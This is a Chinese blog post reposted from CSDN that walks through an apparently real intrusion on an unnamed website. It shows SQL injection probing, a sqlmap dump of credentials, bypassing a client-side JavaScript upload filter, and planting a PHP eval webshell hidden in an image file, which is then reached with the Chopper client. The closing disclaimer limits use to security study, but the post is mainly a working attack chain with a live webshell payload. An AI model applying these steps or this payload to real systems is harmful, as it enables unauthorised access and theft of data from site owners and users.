记录一次实战,注入+本地JS绕过拿shell

华盟原创文章投稿奖励计划

记录一次实战,注入+本地JS绕过拿shell

正文

1.找注入点

记录一次实战,注入+本地JS绕过拿shell

2.测试是否有注入:

http://xxxxxx/xxxx.php?id=6’ ,没有回显

记录一次实战,注入+本地JS绕过拿shell

输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2没有回显,说明存在注入。
3. 使用sqlmap跑。

sqlmap.py -u “http://xxxxx/xxxx.php?id=6”

记录一次实战,注入+本地JS绕过拿shell

发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。
4.使用御剑扫描后台。然后进行登录。记录一次实战,注入+本地JS绕过拿shell

我们先上传一个脚本木马试试。记录一次实战,注入+本地JS绕过拿shell

发现有黑名单。先看下是否是本地js校验。右键审查元素,发现是本地js校验。记录一次实战,注入+本地JS绕过拿shell

我们找到表单form,删除相对应的脚本。记录一次实战,注入+本地JS绕过拿shell

5.重新上传php一句话,发现记录一次实战,注入+本地JS绕过拿shell
那么试下图片马
6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>记录一次实战,注入+本地JS绕过拿shell记录一次实战,注入+本地JS绕过拿shell

保存,命名为a.php。然后上传,发现上传成功,使用菜刀连接,密码pw。

记录一次实战,注入+本地JS绕过拿shell

文章来源:CSDN博客(Randmancy)

原文地址:

https://blog.csdn.net/qq_34341458/article/details/113845203

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

记录一次实战,注入+本地JS绕过拿shell

本文来源CSDN博客,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复